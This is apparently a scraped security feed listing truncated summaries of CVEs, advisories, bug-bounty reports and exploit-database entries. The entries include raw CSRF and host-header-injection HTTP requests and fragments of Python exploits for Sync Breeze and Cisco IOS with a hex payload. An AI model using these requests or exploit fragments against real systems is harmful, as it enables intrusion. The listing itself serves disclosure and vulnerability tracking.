CVE-2016-9526

CVE-2016-9526 is rejected/not used per the Initial Description.

CVE-2016-9656

CVE-2016-9656 is rejected/not used and does not represent an active vulnerability entry.

CVE-2016-9688

The CVE-2016-9688 entry is rejected/not used per the Initial Description.

Windows COM Elevation of Privilege Vulnerability

An elevation of privilege exists in Windows COM Aggregate Marshaler. An attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges. To exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability...

Dashlane: Extract Billing admin email address using random team id

Any user can extract and enumerate email address of dashlane members. Steps to reproduce 1 Login to console.dashlane.com Register using https://www.dashlane.com/business/try 2 Click on Manage Users while intercepting request in Burp 3 Look for a request to...

Request KeyChain Access

github.com/docker/docker-credential-helpers requests keychain access for random keys. This is when the credential helper doesn't have a login keychain specified. It then tries to look at every registered keychain...

Exploit for OS Command Injection in Pfsense

Developed Exploits This repository will contain any exploit o...

Weblate: CSRF : Lock and Unlock Translation

Description : Attacker can force to victim for Lock and Unlock Translation. That HTTP Request : GET /lock/aptoide-uploader/strings/ka/ HTTP/1.1 Host: hosted.weblate.org Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10123 AppleWebKit/537.36 KHTML,...

Weblate: CSRF : Reset API

Description : Attacker can force to victim for reset his API. That HTTP Request : GET /accounts/reset-api-key/ HTTP/1.1 Host: hosted.weblate.org Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10123 AppleWebKit/537.36 KHTML, like Gecko...

Scientific Linux Security Update : bind on SL7.x x86_64 (20170419)

Security Fixes : - A denial of service flaw was found in the way BIND handled a query response containing CNAME or DNAME resource records in an unusual order. A remote attacker could use this flaw to make named exit unexpectedly with an assertion failure via a specially crafted DNS response...

Homebrew: Host header Injection

HI SECURITY TEAM Here is host header injection. Request changing host to www.google.com GET / HTTP/1.1 Host: www.google.com User-Agent: Mozilla/5.0 Windows NT 6.1; rv:24.0 Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language:...

Authentication flaw

The TMM SSO plugin in F5 BIG-IP APM 12.0.0 - 12.1.1, 11.6.0 - 11.6.1 HF1, 11.5.4 - 11.5.4 HF2, when configured as a SAML Identity Provider with a Service Provider SP connector, might allow traffic to be disrupted or failover initiated when a malformed, signed SAML authentication request from an...

Exploit for Improper Input Validation in Cisco Ios

CVE-2017-3881 Cisco IOS remote code execution ==================...

Sync Breeze Enterprise 9.5.16 - GET Buffer Overflow (SEH) Exploit

Exploit for windows platform in category remote exploits !/usr/bin/env python Exploit Title: Sync Breeze Enterprise v9.5.16 - Remote buffer overflow SEH Date: 2017-03-29 Exploit Author: Daniel Teixeira Vendor Homepage: http://syncbreeze.com Software Link:...

Denial Of Service (DoS)

keycloak-saml-core is vulnerable to denial of service DoS attacks. The vulnerability exists due to the mishandling of a Logout request with an Extensions in the middle of the request...

Xxe

XML External Entity XXE vulnerability in PySAML2 4.4.0 and earlier allows remote attackers to read arbitrary files via a crafted SAML XML request or response...

EON 5.0 SQL Injection

CVE-2017-6088 EON 5.0 Multiple SQL Injection Description EyesOfNetwork "EON" is an OpenSource network monitoring solution. SQL injection authenticated The Eonweb code does not correctly filter arguments, allowing authenticated users to inject arbitrary SQL requests. CVE ID: CVE-2017-6088 Access...

PloitKit - The Hacker's ToolBox

PloitKit is a Python based GUI tool designed as one-stop for all other softwares. I was facing these kinds of problem, when I need to switch to different system, or I lost my pen-drive. I have to go to google, and search every tool and download every tool and so on. So I decided to create a tool,...

Cisco IOS 12.2 12.4 15.0 15.6 - Security Association Negotiation Request Device Memory

Cisco IOS 12.2 12.4 15.0 15.6 - Security Association Negotiation Request Device Memory !/usr/bin/python -- coding: utf8 -- import socket from scapy.all import --------------------------- Requirements: $ sudo pip install scapy --------------------------- conf.verb = 0 RCVSIZE = 2548 TIMEOUT = 6...

Cisco IOS 12.2 < 12.4 / 15.0 < 15.6 - Security Association Negotiation Request Device Memory

!/usr/bin/python -- coding: utf8 -- import socket from scapy.all import --------------------------- Requirements: $ sudo pip install scapy --------------------------- conf.verb = 0 RCVSIZE = 2548 TIMEOUT = 6 payload = '5\xc7\x07\xdf\xed\xef\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x02' payload +=...